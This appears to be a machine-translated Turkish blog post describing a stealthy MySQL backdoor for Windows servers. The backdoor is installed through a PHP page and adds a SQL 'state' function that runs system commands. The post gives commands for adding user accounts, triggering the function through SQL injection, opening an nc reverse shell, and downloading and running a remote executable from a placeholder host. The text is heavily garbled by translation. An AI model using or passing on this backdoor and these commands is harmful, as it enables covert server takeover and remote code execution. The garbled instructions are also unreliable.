Mysql Backdoor
Kaynak: Puri Manchester
Mysql Backdoor eklemek yüklemek için arka kapıdan sonra MySQL PHP + MySQL sunucusu gelişimi için bir arka kapı "devlet" işlevi sistem komutları çalıştırmak ve Dll sniffer tipi arka kapıya dayanır Mysql süreci ile başlar, kurnazca fark edebilirsiniz + MYSQL5.0.X ve pas altında WINXP Win2003 hiçbir liman, hiçbir süreç, duvar Truva yoluyla hiçbir hizmet. programı.
Kurulum, PHP sunucu yayıldı Host-User-Password-DB doldurmak göre mysql.php olacaktır, "auto-install Mysql arka kapı" linkine tıklayın
Mysql işlemi Windows, bu arka kapı ve arka kapı koklama aynı sistem ayrıcalıkları ve Mysql sahip çalışırken Başarılı bir kurulumdan sonra, Mysql, bir "devlet" işlevi artış olacaktır.
Devlet işlevlerinin kullanımı
Devlet fonksiyonu "aynı işlevi sistem komutları çalıştırmak için kullanılabilir fonksiyonu SQL komutunu giriniz.:" Aslında bir PHP sistemi () 'dir Ofis ve bu tür "(devlet seçin" net user nohack olarak yürütülecek mysql açıklamada, doldurun ekle / SQL deyimleri sonuçları çalışacak Execute "), tıklayın".
Devletin işlevi sunucu sürece WebShell kayıp, SQL enjeksiyon noktası, biz enjeksiyon yoluyla. Php? Id = 1 ve devlet ('net user') "yöntem, sunucu çalıştırır bile, arka kapı Sniff dayalı ile .? enjeksiyon noktası, eğer değilse komutu Ancak, yine arka kapıyı kontrol sunucusu Sniff arama sunucusunun herhangi bir bağlantı noktasına gönderilen ve Mysql-"paket başlangıcı gibi arka kapı, Sniff aramak mümkün olacak açık.
Çalışan bir sistem komutu: nc ip 80 -> girin -> Mysql-cmd / c net user abc / add> c :/ log.txt, (Not: "!" Son ihmal edilemez)
-> Enter -> Mysql-c -> Enter nc-lp nc 20 082 makinenin 20082 portu izlemek ve sonra ip 80 ilk çalıştırma: yerel sunucu sıçrama için kabuk 2 20082 portu
Server indir edelim: nc ip 80 -> girin -> Mysql-http :/ / www.x.com / door.exe-c mydoor.exe (Not: son "ihmal edilemez)
"Mysql-c-" göndermeye ek olarak, başka bir komut, yankı, fakat sunucusunda karşılık gelen komutları çalışan.
Run "bırak fonksiyonu devlet" Mysql Kaldır kaldırıldı, ancak aynı zamanda yeniden başlatıldıktan sonra normale döner, mysql sürecini çıkmasına neden olacaktır.










































154 Trackback (s)
Siz gereken oturum Yorum yazmak için.